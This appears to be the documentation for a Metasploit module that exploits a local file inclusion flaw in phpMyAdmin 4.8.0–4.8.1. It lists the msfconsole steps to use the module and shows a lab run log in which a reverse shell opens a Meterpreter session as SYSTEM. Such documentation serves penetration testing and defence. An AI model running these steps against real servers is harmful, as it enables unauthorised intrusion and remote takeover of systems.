## Description

phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.

## Vulnerable Application

[phpMyAdmin v4.8.1](https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-languages.zip) and v4.8.0

## Verification Steps

1. `./msfconsole -q`
2. `use exploit/multi/http/phpmyadmin_lfi_rce`
3. `set rhosts <rhost>`
4. `run`

## Scenarios

### Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1

```
msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    :
OS          : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```